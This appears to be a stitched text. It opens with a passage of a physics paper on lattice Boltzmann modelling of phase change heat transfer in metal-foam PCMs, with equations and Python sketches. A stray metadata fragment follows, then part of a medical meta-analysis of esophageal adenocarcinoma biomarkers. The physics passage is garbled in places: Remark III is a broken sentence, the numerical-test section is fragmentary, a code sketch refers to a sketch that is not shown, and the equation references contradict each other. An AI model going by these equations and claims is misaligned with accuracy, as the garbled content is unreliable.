The MRT method [28,71] is an important extension of the relaxation LB method developed by Higuera et al. [25]. In the MRT method, the collision process of the LB equation is executed in moment space, while the streaming process is carried out in velocity space. By using the MRT collision model, the relaxation times of the hydrodynamic and non-hydrodynamic moments can be separated. According to Refs. [72,73], the MRT-LB equation with an explicit treatment of the forcing term can be written as

$$\mathbf{f}\left(\mathbf{x}+\mathbf{e}\delta_t,\, t+\delta_t\right) = \mathbf{f}\left(\mathbf{x}, t\right) - \mathbf{M}^{-1}\mathbf{\Lambda}\left[\mathbf{m}-\mathbf{m}^{eq}\right]\left(\mathbf{x}, t\right) + \delta_t\, \mathbf{M}^{-1}\left(\mathbf{I}-\frac{\mathbf{\Lambda}}{2}\right)\mathbf{S}\left(\mathbf{x}, t\right), \tag{12}$$

where $\mathbf{I}$ is the identity matrix, $\mathbf{\Lambda} = \mathrm{diag}\left(s_0, s_1, \ldots, s_8\right)$ is the diagonal relaxation matrix, and $\mathbf{M}$ is the orthogonal transformation matrix

$$\mathbf{M} = \begin{pmatrix} 1 & 1 & 1 & 1 & 1 & 1 & 1 & 1 & 1\\ -4 & -1 & -1 & -1 & -1 & 2 & 2 & 2 & 2\\ 4 & -2 & -2 & -2 & -2 & 1 & 1 & 1 & 1\\ 0 & 1 & 0 & -1 & 0 & 1 & -1 & -1 & 1\\ 0 & -2 & 0 & 2 & 0 & 1 & -1 & -1 & 1\\ 0 & 0 & 1 & 0 & -1 & 1 & 1 & -1 & -1\\ 0 & 0 & -2 & 0 & 2 & 1 & 1 & -1 & -1\\ 0 & 1 & -1 & 1 & -1 & 0 & 0 & 0 & 0\\ 0 & 0 & 0 & 0 & 0 & 1 & -1 & 1 & -1 \end{pmatrix}. \tag{13}$$

Through the transformation matrix $\mathbf{M}$, the collision process of the MRT-LB equation (12) can be executed in moment space,

$$\mathbf{m}^{*} = \mathbf{m} - \mathbf{\Lambda}\left(\mathbf{m}-\mathbf{m}^{eq}\right) + \delta_t\left(\mathbf{I}-\frac{\mathbf{\Lambda}}{2}\right)\mathbf{S}, \tag{14}$$

where the bold-face symbols $\mathbf{m}$, $\mathbf{m}^{eq}$, and $\mathbf{S}$ denote 9-dimensional column vectors of moments. The streaming process is still carried out in velocity space,

$$f_i\left(\mathbf{x}+\mathbf{e}_i\delta_t,\, t+\delta_t\right) = f_i^{*}\left(\mathbf{x}, t\right), \tag{15}$$

where $\mathbf{f}^{*} = \mathbf{M}^{-1}\mathbf{m}^{*}$. The transformation matrix $\mathbf{M}$ linearly maps the discrete distribution functions $\mathbf{f} \in \mathbb{V} = \mathbb{R}^9$ to their velocity moments $\mathbf{m} \in \mathbb{M} = \mathbb{R}^9$, i.e., $\mathbf{m} = \mathbf{M}\mathbf{f}$. The equilibrium moment $\mathbf{m}^{eq}$ corresponding to $\mathbf{m}$ is defined as [73]

$$\mathbf{m}^{eq} = \rho\left(1,\; \alpha_1 + \frac{3\left|\mathbf{u}\right|^2}{\phi},\; \alpha_2 - \frac{3\left|\mathbf{u}\right|^2}{\phi},\; u_x,\; -u_x,\; u_y,\; -u_y,\; \frac{u_x^2-u_y^2}{\phi},\; \frac{u_x u_y}{\phi}\right)^{\mathsf{T}},$$

where $\rho = \rho_f$, and $\alpha_1$ and $\alpha_2$ are free parameters. The forcing term in moment space $\mathbf{S}$ is given by [73]

$$\mathbf{S} = \left(0,\; \frac{6\,\mathbf{u}\cdot\mathbf{F}}{\phi},\; -\frac{6\,\mathbf{u}\cdot\mathbf{F}}{\phi},\; F_x,\; -F_x,\; F_y,\; -F_y,\; \frac{2\left(u_x F_x - u_y F_y\right)}{\phi},\; \frac{u_x F_y + u_y F_x}{\phi}\right)^{\mathsf{T}},$$

where $F_x$ and $F_y$ are the $x$- and $y$-components of the total body force $\mathbf{F}$, respectively.
As mentioned in Section I, it is not appropriate to use the bounce-back scheme, in which the liquid fraction $f_l = 0.5$ is defined as the phase interface and the collision process (14) is performed only for $f_l > 0.5$, to impose the no-slip velocity condition in the interface region. To accurately realize the no-slip velocity condition in the interface and solid phase regions, the volumetric LB scheme [67] is employed in the present study. With the volumetric LB scheme, the flow field is modeled over the entire domain (including the liquid and solid phase regions). Considering the effect of the solid phase, the density distribution function $f_i$ is redefined as

$$f_i = f_l\, f_i^{+} + \left(1 - f_l\right) f_i^{eq}\left(\rho, \mathbf{u}_s\right),$$

where $f_i^{+}$ is given by Eq. (15), and $\mathbf{u}_s = 0$ is the velocity of the solid phase. The above equation is based on the kinetic assumption that the solid-phase density distribution function is at its equilibrium state. Accordingly, the macroscopic density $\rho$ and velocity $\mathbf{u}$ are defined as

$$\rho = \sum_i f_i, \qquad \rho\,\mathbf{u} = \sum_i \mathbf{e}_i f_i + \frac{\delta_t}{2}\rho\,\mathbf{F}, \tag{22}$$

and the macroscopic pressure $p$ is given by $p = \rho c_s^2/\phi$. Eq. (22) is a nonlinear equation for the velocity $\mathbf{u}$ because $\mathbf{F}$ also contains the velocity. According to Ref. [74], the macroscopic velocity $\mathbf{u}$ can be calculated explicitly by

$$\mathbf{u} = \frac{\mathbf{v}}{c_0 + \sqrt{c_0^2 + c_1\left|\mathbf{v}\right|}},$$

where the temporal velocity $\mathbf{v}$ is given by $\rho\,\mathbf{v} = \sum_i \mathbf{e}_i f_i + \frac{\delta_t}{2}\phi\rho\,\mathbf{G}$, with the parameters

$$c_0 = \frac{1}{2}\left(1 + \phi\,\frac{\delta_t}{2}\frac{\nu_f}{K}\right), \qquad c_1 = \phi\,\frac{\delta_t}{2}\frac{F_\phi}{\sqrt{K}}.$$

Through the Chapman-Enskog analysis of the MRT-LB equation (12), the mass and momentum conservation equations (1) and (2) can be recovered in the incompressible limit. The effective kinematic viscosity $\nu_e$ and the bulk viscosity $\nu_B$ are given by

$$\nu_e = c_s^2\left(\frac{1}{s_\nu} - \frac{1}{2}\right)\delta_t, \qquad \nu_B = c_s^2\left(\frac{1}{s_e} - \frac{1}{2}\right)\delta_t,$$

respectively, where $c_s = c/\sqrt{3}$ is the lattice sound speed, $s_\nu = s_7 = s_8$, and $s_e = s_1$. The corresponding equilibrium distribution function in velocity space is

$$f_i^{eq} = w_i\, \rho\left[1 + \frac{\mathbf{e}_i\cdot\mathbf{u}}{c_s^2} + \frac{\left(\mathbf{e}_i\cdot\mathbf{u}\right)^2}{2c_s^4\,\phi} - \frac{\left|\mathbf{u}\right|^2}{2c_s^2\,\phi}\right],$$

where $w_0 = 4/9$, $w_{1\text{-}4} = 1/9$, and $w_{5\text{-}8} = 1/36$.
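The explicit velocity evaluation above avoids any iteration even though $\mathbf{F}$ depends on $\mathbf{u}$. A minimal sketch of this step is given below (Python assumed; the function name is hypothetical and the velocity set `e` is the one defined in the earlier sketch, repeated here for self-containment):

```python
import numpy as np

e = np.array([[0, 0],
              [1, 0], [0, 1], [-1, 0], [0, -1],
              [1, 1], [-1, 1], [-1, -1], [1, -1]], dtype=float)

def macroscopic_velocity(f, rho, phi, nu_f, K, F_phi, G, dt=1.0):
    """Explicit velocity evaluation for the generalized non-Darcy model:
    since the total body force contains the linear and quadratic drag terms,
    u satisfies a quadratic equation and is computed in closed form.
    f: (9,) distributions at one node; G: (2,) buoyancy force."""
    v = (f @ e) / rho + 0.5 * dt * phi * np.asarray(G)   # temporal velocity
    c0 = 0.5 * (1.0 + 0.5 * dt * phi * nu_f / K)
    c1 = 0.5 * dt * phi * F_phi / np.sqrt(K)
    return v / (c0 + np.sqrt(c0**2 + c1 * np.linalg.norm(v)))
```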
B. MRT-LB models for temperature fields
For solid-liquid phase change heat transfer in metal foams under LTNE condition, the temperature fields are solved separately by two different MRT-LB models: an enthalpy-based MRT-LB model is proposed to solve the PCM temperature field, while an internal-energy-based MRT-LB model is proposed to solve the metal foam temperature field. In this subsection, the MRT-LB models for temperature fields will be presented. In addition, some remarks about the MRT-LB models will also be presented.
Enthalpy-based MRT-LB model for PCM temperature field
By absorbing the nonlinear latent heat source term into the transient term, the energy equation (5) of the PCM can be rewritten in terms of the total enthalpy $H_f$ as

$$\phi \rho_f \frac{\partial H_f}{\partial t} + \rho_f c_{p,f}\,\nabla\cdot\left(\mathbf{u}\, T_f\right) = \nabla\cdot\left(k_{fe}\nabla T_f\right) + h_v\left(T_m - T_f\right), \tag{28}$$

where the total enthalpy $H_f = c_{p,f} T_f + f_l L_a$ includes both the sensible and the latent heat. The enthalpies at the solidus and liquidus temperatures are $H_s = c_{p,s} T_s$ and $H_l = c_{p,l} T_l + L_a$, where $H_l$ is the enthalpy of the liquid PCM and $H_s$ is the enthalpy of the solid PCM.
For the PCM temperature field governed by Eq. (28), the following MRT-LB equation is employed:

$$\mathbf{g}\left(\mathbf{x}+\mathbf{e}\delta_t,\, t+\delta_t\right) = \mathbf{g}\left(\mathbf{x}, t\right) - \mathbf{M}^{-1}\boldsymbol{\Theta}\left[\mathbf{n}_g-\mathbf{n}_g^{eq}\right]\left(\mathbf{x}, t\right) + \delta_t\, \mathbf{M}^{-1}\mathbf{S}_{\mathrm{PCM}}\left(\mathbf{x}, t\right), \tag{31}$$

where $\mathbf{M}$ is the transformation matrix [see Eq. (13)] and $\boldsymbol{\Theta}$ is the relaxation matrix. The collision process of the above MRT-LB equation is executed in moment space,

$$\mathbf{n}_g^{*} = \mathbf{n}_g - \boldsymbol{\Theta}\left(\mathbf{n}_g - \mathbf{n}_g^{eq}\right) + \delta_t\, \mathbf{S}_{\mathrm{PCM}},$$

where $\mathbf{n}_g = \mathbf{M}\mathbf{g}$ is the moment vector and $\mathbf{n}_g^{eq} = \mathbf{M}\mathbf{g}^{eq}$ is the corresponding equilibrium moment vector, with $g_i^{eq}$ the equilibrium enthalpy distribution function in velocity space. The streaming process is carried out in velocity space,

$$g_i\left(\mathbf{x}+\mathbf{e}_i\delta_t,\, t+\delta_t\right) = g_i^{*}\left(\mathbf{x}, t\right),$$

where $\mathbf{g}^{*} = \mathbf{M}^{-1}\mathbf{n}_g^{*}$. The equilibrium moment $\mathbf{n}_g^{eq}$ is constructed from the enthalpy $\phi H_f$ (the conserved zeroth-order moment) and the convective flux $c_{p,f,\mathrm{ref}}\, T_f\, \mathbf{u}$ (the first-order moments), where $c_{p,f,\mathrm{ref}}$ is a reference specific heat. As in Ref. [66], the reference specific heat is introduced into the equilibrium moment so that the specific heat and the thermal conductivity of the PCM are decoupled.
To recover the enthalpy-based energy equation (28), the source term in moment space $\mathbf{S}_{\mathrm{PCM}}$ is chosen such that the interfacial heat exchange term $h_v\left(T_m - T_f\right)$ in Eq. (28) is exactly recovered. The enthalpy-based energy equation (28) is actually a nonlinear convection-diffusion equation with a source term. Therefore, a time-derivative term is included in the discrete source term, as suggested in the literature [75]. Without this derivative term, an unwanted additional term would appear in the macroscopic equation recovered from the MRT-LB equation (31). The details are described through the Chapman-Enskog analysis [76] in Appendix A.
The enthalpy $H_f$ is computed by

$$H_f = c_{p,f}\, T_f + f_l\, L_a.$$

The relationship between the enthalpy $H_f$ and the temperature $T_f$ is given by

$$T_f = \begin{cases} H_f/c_{p,s}, & H_f \le H_s,\\[2pt] T_s + \dfrac{H_f - H_s}{H_l - H_s}\left(T_l - T_s\right), & H_s < H_f < H_l,\\[2pt] T_l + \left(H_f - H_l\right)/c_{p,l}, & H_f \ge H_l, \end{cases}$$

and the liquid fraction is $f_l = 0$ for $H_f \le H_s$, $f_l = \left(H_f - H_s\right)/\left(H_l - H_s\right)$ for $H_s < H_f < H_l$, and $f_l = 1$ for $H_f \ge H_l$. The equilibrium enthalpy distribution function $g_i^{eq}$ in velocity space ($i = 0$-$8$) follows from the equilibrium moments through $\mathbf{g}^{eq} = \mathbf{M}^{-1}\mathbf{n}_g^{eq}$.
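Because the enthalpy-temperature relation is piecewise linear, the temperature and liquid fraction can be recovered locally from $H_f$ without iteration, which is the key point of Remark III below. A minimal sketch (Python assumed, scalar version for clarity) is:

```python
def enthalpy_to_temperature(Hf, cps, cpl, Ts, Tl, La):
    """Invert the enthalpy-temperature relation of the enthalpy method:
    given the total enthalpy Hf, return (Tf, fl). Hs and Hl are the
    enthalpies at the solidus and liquidus, consistent with the
    definitions above."""
    Hs = cps * Ts                 # enthalpy of the solid PCM at Ts
    Hl = cpl * Tl + La            # enthalpy of the liquid PCM at Tl
    if Hf <= Hs:                  # solid phase
        return Hf / cps, 0.0
    if Hf >= Hl:                  # liquid phase
        return Tl + (Hf - Hl) / cpl, 1.0
    fl = (Hf - Hs) / (Hl - Hs)    # mushy zone: linear interpolation
    return Ts + fl * (Tl - Ts), fl
```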
Internal-energy-based MRT-LB model for metal foam temperature field
The energy equation (6) of the metal foam can be rewritten as

$$\frac{\partial T_m}{\partial t} = \nabla\cdot\left(\alpha_{me}\nabla T_m\right) + \frac{h_v\left(T_f - T_m\right)}{\left(1-\phi\right)\rho_m c_m}, \tag{41}$$

where $\alpha_{me} = k_{me}/\left[\left(1-\phi\right)\rho_m c_m\right]$. For the metal foam temperature field governed by the above equation, an MRT-LB equation of the same form as Eq. (31) is employed for the internal-energy distribution function $h_i$: the collision process is executed in moment space with $\mathbf{n}_h = \mathbf{M}\mathbf{h}$ and $\mathbf{n}_h^{eq} = \mathbf{M}\mathbf{h}^{eq}$, where $h_i^{eq}$ is the equilibrium internal-energy distribution function in velocity space, and the streaming process is carried out in velocity space. The discrete source term $\mathbf{S}_{\mathrm{metal}}$ is chosen so that the interfacial heat exchange term in Eq. (41) is exactly recovered. The temperature $T_m$ is defined through the zeroth-order moment of $h_i$, and $h_i^{eq}$ follows from $\mathbf{h}^{eq} = \mathbf{M}^{-1}\mathbf{n}_h^{eq}$. Through the Chapman-Enskog analysis [76] of the MRT-LB equation (31), the macroscopic energy equation (28) can be recovered up to an additional velocity-dependent term [the last term in Eq. (50); see Appendix A for details].
Remark III. The energy equations (28) and (41) , , , which does not affect the inherent merits of the LB method. Unlike the iteration method in previous studies [21][22][23], the MRT-LB equation (31) is completely local and is easy to implement in the same way as the standard MRT-LB equation.
Remark IV. The two-dimensional five-velocity (D2Q5) lattice can also be employed. The MRT-LB models for the temperature fields based on D2Q5 lattice are presented in Appendix B.
C. Boundary conditions and relaxation rates
In this subsection, the boundary conditions and relaxation rates are briefly introduced. For the velocity and thermal boundary conditions, the non-equilibrium extrapolation scheme [77] is employed. It should be noted that the no-slip velocity boundary condition on the walls is treated based on $f_i^{+}$ rather than $f_i$, i.e., before the effect of the solid phase is considered. For a boundary node $\mathbf{x}_b$ at which the distribution function is unknown, the discrete density distribution function is given by

$$f_i\left(\mathbf{x}_b, t\right) = f_i^{eq}\left(\mathbf{x}_b, t\right) + \left[f_i\left(\mathbf{x}_f, t\right) - f_i^{eq}\left(\mathbf{x}_f, t\right)\right],$$

where $\mathbf{x}_f$ is the neighboring fluid node of $\mathbf{x}_b$. The relaxation rates of the thermal MRT-LB models are chosen according to the relationship of Eq. (53). As reported in Ref. [66], by using this relationship, the numerical diffusion across the phase interface can be significantly reduced in simulating solid-liquid phase change problems without porous media. Although solid-liquid phase change heat transfer in metal foams is much more complicated, the relationship given by Eq. (53) is employed in the present study.
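The non-equilibrium extrapolation scheme amounts to one line per unknown distribution; a minimal sketch (Python assumed; `feq_b` is built from the prescribed boundary density and velocity) is:

```python
def noneq_extrapolation(feq_b, f_f, feq_f):
    """Non-equilibrium extrapolation [77] at a boundary node b: the unknown
    distribution equals the boundary equilibrium plus the non-equilibrium
    part copied from the neighboring fluid node f. All arguments are
    (9,) NumPy arrays of distributions."""
    return feq_b + (f_f - feq_f)
```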
IV. NUMERICAL TESTS
A. Conduction-induced solidification in a semi-infinite domain

In this subsection, conduction-induced solidification in a semi-infinite domain is simulated. The governing dimensionless parameters (such as Pr) are defined with L the characteristic length and ΔT the characteristic temperature. [Figure: the blue solid and red dashed lines represent the present and the FDM results, respectively.]
B. Melting coupled with natural convection
In this subsection, numerical simulations of melting coupled with natural convection in a square cavity filled with metal-foam-based PCM are carried out to validate the present method. The schematic diagram of this problem is shown in Fig. 4. The present results are found to agree well with the FVM solutions [15].
From Fig. 5(a) it can be seen that at Ra = 10^6, the heat transfer process is dominated by conduction because the metal foam-to-PCM thermal conductivity ratio is very large (λ = 10^3), and the shape of the phase interface is almost planar during the melting process. As Ra increases to 10^8, the effect of natural convection on the shape of the phase interface becomes stronger. As shown in Fig. 5(b), due to the convective effect, the phase interface moves faster near the top wall. As mentioned in Section I, for solid-liquid phase change in metal-foam-based PCMs, the phase interface is a diffusive interface with a certain thickness rather than a sharp interface, which is usually referred to as the interface region or mushy zone. In Fig. 6, the streamlines with the phase interface at different Fourier numbers for Ra = 10^6 are shown. From the figure we can see that, during the melting process (Fo ≤ 0.002), the thickness of the phase interface is around ten lattices, as a result of the interfacial heat transfer between the PCM and metal foam. In the quasi-steady regime (Fo = 0.008), the movement of the phase interface is slow enough that it only occupies one or two lattices. The streamlines with the phase interface at different Fourier numbers for Ra = 10^8 are shown in Fig. 7.
The overall behavior is similar to that with Ra = 10^6, albeit with a stronger convective effect. The temperature profiles at the mid-height (y/L = 0.5) of the cavity at different Fourier numbers for Ra = 10^6 and 10^8 are shown in Fig. 8. As can be seen in the figure, the temperature profiles of the PCM and metal foam develop together in a coupled manner. Initially (Fo = 0.00005), the metal foam-to-PCM temperature difference is rather high, but it progressively decreases with the Fourier number. At Fo = 0.006, the temperature profiles of the PCM and metal foam are seen to be nearly identical, which indicates that the thermal non-equilibrium effect between the PCM and metal foam is weak. Fig. 8 clearly shows that the maximum metal foam-to-PCM temperature difference appears near the phase interface. For comparison, the FVM results [15] are also presented in the figure (for clarity, the FVM results at Fo = 0.006 are not presented). It can be observed from the figure that the present results agree well with the FVM results reported in the literature. The variations of the total liquid fraction with the Fourier number for Ra = 10^6 are shown in Fig. 9. As shown in the figure, the metal foam helps utilize the PCM much more effectively.
V. COMPARISONS AND DISCUSSIONS

B. Volumetric LB scheme vs. bounce-back scheme
In the literature [62], the bounce-back scheme was used to impose the no-slip velocity condition on the phase interface and in the solid phase region. Although this approach has some drawbacks (see Ref. [67] for details), it can produce reasonable results when the phase interface occupies one or two lattices. However, for solid-liquid phase change heat transfer in metal foams under the LTNE condition, it is not appropriate to use the bounce-back scheme to impose the no-slip velocity condition, because the phase interface is actually a region (the so-called interface region or mushy zone) with a certain thickness during the phase change process (see Figs. 6 and 7). In what follows, comparisons between the volumetric LB scheme and the bounce-back scheme are made to demonstrate this point. In Fig. 11, the streamlines at different Fourier numbers are shown. Clearly, significant small-scale (of the order of the lattice size) oscillations can be seen in the streamlines obtained by the bounce-back scheme [see Fig. 11(a)], while the streamlines obtained by the volumetric LB scheme are smooth [see Fig. 11(b)]. In the flow field obtained by the bounce-back scheme, nonphysical oscillations occur near the phase interface [marked by the red circles in Fig. 12(a); note that f_l = 0.5 is defined as the phase interface]. On the contrary, the flow field obtained by the volumetric LB scheme [see Fig. 12(b)] is rather reasonable. As can be seen in Fig. 12(b), the flow in the interface region is much weaker than that in the liquid phase region near the liquid/mushy interface. It is found that u_y in the liquid phase region near the liquid/mushy interface is markedly larger than that within the interface region.
C. Present enthalpy scheme vs. iteration enthalpy scheme
In previous studies [21-23], the nonlinear latent heat source term [the underlined term in Eq. (5)] is treated as a source term in the LB equation of the PCM temperature field, which makes the explicit time-marching LB equation implicit. Therefore, the iteration enthalpy scheme [60] is needed to obtain the convergent solution of the implicit LB equation. By using the present enthalpy scheme, the iteration procedure can be avoided in simulations. In Table I, the present enthalpy scheme is compared with the iteration enthalpy scheme.
VI. CONCLUSIONS
In summary, an enthalpy-based MRT-LB method has been developed for solid-liquid phase change heat transfer in metal foams under the LTNE condition. In the method, the moving solid-liquid phase interface is implicitly tracked through the liquid fraction, which is simultaneously obtained when the energy equations of the PCM and metal foam are solved. The present method has three distinctive features. First, the iteration procedure has been avoided; thus it retains the inherent merits of the standard LB method and is superior to the iteration method in terms of accuracy and computational efficiency. Second, by using the volumetric LB scheme, the no-slip velocity condition in the interface and solid phase regions can be accurately realized. Third, the MRT collision model is employed, and with its additional degrees of freedom, it has the ability to reduce the numerical diffusion across the phase interface induced by solid-liquid phase change. For solid-liquid phase change heat transfer in metal foams, it has been unequivocally demonstrated that the MRT method is superior to its BGK counterpart in terms of accuracy and numerical stability.
Detailed numerical tests of the enthalpy-based MRT-LB method have been carried out for two types of solid-liquid phase change heat transfer problems: conduction-induced solidification in a semi-infinite domain and melting coupled with natural convection in a square cavity filled with metal-foam-based PCM. It is found that the present results are in good agreement with the FDM or FVM results, which demonstrates that the present method can serve as an accurate and efficient numerical tool for studying metal foam enhanced solid-liquid phase change heat transfer in LHS.
Finally, comparisons and discussions are made to offer some insights into the roles of the collision model, volumetric LB scheme, enthalpy formulation, and relaxation rate ζ_e in the enthalpy-based MRT-LB method, which are very useful for practical applications.
Appendix A. In this appendix, the Chapman-Enskog analysis is performed to derive the macroscopic energy equation of the MRT-LB equation (31). To this end, the following multiscale expansions of n_g, the derivatives of time and space, and the source term are introduced: n_g = n_g^(0) + ε n_g^(1) + ε^2 n_g^(2) + ⋯, where ε is a small expansion parameter. Taking a second-order Taylor series expansion of Eq. (31) and substituting the above expansions, the equations at consecutive orders of ε can be obtained.
where E = (E_x, E_y)^T.
"year": 2016,
"sha1": "493ffab684d9aa64a0339d55f10429cf5edb61f3",
"oa_license": null,
"oa_url": "http://arxiv.org/pdf/1701.00702",
"oa_status": "GREEN",
"pdf_src": "Arxiv",
"pdf_hash": "493ffab684d9aa64a0339d55f10429cf5edb61f3",
"s2fieldsofstudy": [
"Physics"
],
"extfieldsofstudy": [
"Physics",
"Medicine",
"Materials Science"
]
} |
A systematic review and meta-analysis of prognostic biomarkers in resectable esophageal adenocarcinomas
Targeted therapy is lagging behind in esophageal adenocarcinoma (EAC). To guide the development of new treatment strategies, we provide an overview of the prognostic biomarkers in resectable EAC treated with curative intent. The Medline, Cochrane and EMBASE databases were systematically searched, focusing on overall survival (OS). The quality of the studies was assessed using a scoring system ranging from 0–7 points based on modified REMARK criteria. To evaluate all identified prognostic biomarkers, the hallmarks of cancer were adapted to fit all biomarkers based on their biological function in EAC, resulting in the features angiogenesis, cell adhesion and extra-cellular matrix remodeling, cell cycle, immune, invasion and metastasis, proliferation, and self-renewal. Pooled hazard ratios (HR) and 95% confidence intervals (CI) were derived by random effects meta-analyses performed on each hallmark of cancer feature. Of the 3298 unique articles identified, 84 were included, with a mean quality of 5.9 points (range 3.5–7). The hallmark of cancer feature 'immune' was most significantly associated with worse OS (HR 1.88 (95%CI 1.20–2.93)). Of the 82 unique prognostic biomarkers identified, meta-analyses showed prominent biomarkers, including COX-2, PAK-1, p14ARF, PD-L1, MET, LC3B, IGFBP7 and LGR5, associated with each hallmark of cancer feature.
Results
Study characteristics. All 3,298 identified articles were screened on title and abstract (Fig. 1). After assessing 466 articles on full text, 84 articles were included. Six articles were grouped in the adapted hallmark of cancer 'multiple', resulting in 78 articles that could be included in the meta-analysis, investigating a total population of 12,876 EAC patients. The main characteristics of the studies are shown in supplementary Table S1. A total of 82 unique biomarkers were identified. The majority of the biomarkers were detected by immunohistochemistry (IHC) or a combination of IHC and an in situ hybridization method (ISH). Less frequently applied detection methods were PCR, RNA sequencing and DNA sequencing, and one article used a combination of reverse phase protein array (RPPA) analysis, reverse transcriptase-PCR and IHC 95. Most (N = 61) articles included a study population consisting of EAC only, 12 articles included an EAC population that consisted of ≥70% adenocarcinomas, and 11 articles performed separate OS analyses on EAC and other histological subtypes. Of the assessed patients, 1822 (14.2%) received prior chemo(radiation)therapy. The mean study sample size and IF of the articles were 152 patients (standard deviation = 112.16) and 4.54, respectively.

Quality assessment. Assessment of the study quality using the adapted REMARK criteria resulted in a mean quality of 5.9 points (range 3.5-7) (Supplementary Table S2). Three studies had a low quality score and were included in the sensitivity analyses 31. In general, points were lacking for quality criterion C5: reporting whether patients received therapy and, if so, specifying the chemo(radio)therapy regimen. In addition, C1 (a representative cohort with clear baseline characteristics) and C2 (reasons for patient drop-out) were often absent. A positive correlation (R = 0.480) was observed between study size and the impact factor of the journal in which the study was published (p = 0.0005) (Supplementary Fig. S3). There was no correlation (R = 0.058) between the study quality assessed by the adapted REMARK criteria and impact factor (p = 0.601).
Proliferation. The majority of the biomarkers studied are involved in tumor cell proliferation, of which HER2, EGFR, cyclin D, KI67 and MTOR were the most frequently reported (Fig. 2). Subgroup analysis on EGFR demonstrated an association with worse OS, HR 1.43 (95% CI 1.04-1.95). Analysis of the HER2 subgroup, however, showed no significant association with OS, HR 1.28 (95% CI 0.96-1.70). HER2 remained not significantly associated with worse OS when evaluating the HER2 subgroup by including only data on HER2 expression assessed by means of the gold standard (IHC and, in case of equivocal HER2 expression (Hoffman scoring system 2+), an additional in situ hybridization method 96), or when data on EAC with a Barrett's esophagus (BE) segment were replaced by data on EAC without BE (HR 1.09 (95%CI 0.46-2.60) and HR 1.33 (95%CI 0.78-2.28), respectively) (Table 1). The overall pooled effect of the proliferation feature was significantly associated with worse OS (HR 1.41 (95%CI 1.22-1.63)); however, significant test heterogeneity was found. IGFBP7, a member of the insulin-like growth factor receptor family, was identified as the most promising prognostic biomarker in this hallmarks of cancer feature. Funnel plot analyses showed no indication of publication bias (Supplementary Material S4).
Hallmark specific markers. All identified biomarkers and hallmarks of cancer features are summarized in Fig. 3. The potential of all identified prognostic biomarkers was evaluated by assembling the biomarkers, according to their main function in tumor biology, into their corresponding hallmarks of cancer feature. When meta-analyses were performed on all features, most were significantly associated with worse OS, except metabolism (HR 1.56 (95%CI 0.98-2.47)) and self-renewal (HR 1.08 (95%CI 0.81-1.43)). The hallmark of cancer feature 'immune' was most significantly associated with worse OS (HR 1.88 (95%CI 1.20-2.93)). Of the 82 unique prognostic biomarkers identified, meta-analyses showed several promising biomarkers, including COX-2, PAK-1, p14ARF, PD-L1, MET, LC3B and LGR5, associated with each hallmark of cancer feature. After excluding low study quality articles, there was no significant association with OS in the cell adhesion group (N = 1, n = 52, SPARC and SPP1; HR 1.49 (95% CI 1.07-2.07) to HR 1.24 (95% CI 0.83-1.86), respectively) (Table 2) 31,45,58. In additional sensitivity analyses on EAC treated with surgery as a single treatment modality vs. EAC treated with neoadjuvant treatment and surgery, the hallmarks of cancer feature 'cell cycle' was no longer significantly associated with OS (HR 1.43 (95%CI 1.08-1.89) to HR 1.09 (95%CI 0.75-1.57), respectively), although the same biomarkers were tested. The feature 'metabolism' remained not significantly associated with OS. After the sensitivity analyses, the prognostic biomarkers identified as most promising remained unchanged for each hallmark of cancer feature. Funnel plot analyses showed no indication of publication bias.
Discussion
This review summarizes the great diversity of prognostic biomarkers studied in EAC thus far. By grouping the biomarkers, based on their role in tumor biology, into the best-fitting hallmark of cancer feature, 82 unique biomarkers could be identified.
Interestingly, the hallmark of cancer feature 'immune' presented itself as the feature most significantly associated with worse OS, and may therefore harbor potential for targeted therapies. Owing to an increased understanding of the tumor immune micro-environment, and promising trial results, new immune-based therapies have recently emerged, such as the PD-L1/PD-1 targeting agents nivolumab and pembrolizumab 97. Targeting PD-L1/PD-1, a critical immune checkpoint, releases the inhibitory effect on both the humoral and cellular immune response, activating T-cells to enhance the antitumor response. These PD-1 pathway inhibitors have previously been FDA-approved in several solid tumors, including melanoma and non-small cell lung cancer. Indeed, here we identify PD-L1, a ligand of the co-inhibitory receptor PD-1, as the most promising prognostic biomarker included in this hallmarks of cancer feature. However, the clinical applicability of these drugs has not yet been proven in resectable EAC, and whether PD-1 is a predictive biomarker, reflective of response to treatment, remains to be elucidated 4,97.
For all other hallmarks of cancer features, promising prognostic biomarkers were identified as well, including COX-2, PAK-1, p14ARF, MET, LC3B, IGFBP7 and LGR5. For the MET, IGFBP7 and LGR5 pathways, targeted therapies have already been studied in other cancer types with varying results; however, the potential to target these biomarkers in EAC is yet to be investigated 98,99. Likewise, the inhibition of CDK4/6 in p14ARF mutant patients by small molecules or pan-CDK inhibitors is being investigated as an add-on to standard chemotherapy backbones, potentially enabling blockage of the unrestricted cell division caused by p14ARF mutations 100. Non-steroidal anti-inflammatory drugs (NSAIDs), which inhibit COX-2, are commonly used and safe. Hence, inhibition of COX-2, an important regulator of cell growth, differentiation and apoptosis, may be a valuable contribution to the treatment of EAC. Thus far, COX-2 has been demonstrated to be involved in the neoplastic formation of esophageal cancer 101. Moreover, the use of NSAIDs is associated with a reduced risk of EAC development and has been proven to reduce cell growth in 8 esophageal cell lines. By contrast, little is yet known about the potential drugability of PAK-1 in cancer, even though its recently elucidated central role in oncogenic signaling has enhanced interest in small-molecule-based PAK-1 targeting 102. Similarly, the inhibition of autophagy by blocking LC3B has been explored in oncological diseases merely in vitro. Therefore, its therapeutic potential remains to be clarified.
Even though promising prognostic biomarkers were identified, limitations should be recognized. Firstly, after performing sensitivity analysis on study quality, the feature cell adhesion was no longer significantly associated with OS when excluding articles scoring low on the adapted REMARK criteria 31,45,58. In addition, as it is known that low-quality studies hamper extrapolation of the data to clinical practice, it is surprising to note that study size and impact factor were correlated, while no correlation between study quality and impact factor was found. Although the same promising biomarkers were still identified after sensitivity analyses on articles scoring low on the adapted REMARK criteria, the varying study quality is worrying. Frequently, articles failed to report the received therapy and, if this information was supplied, often did not specify the treatment regimen. As neoadjuvant treatment has nowadays become standard of care for operable EAC, reporting these baseline characteristics has become increasingly important.
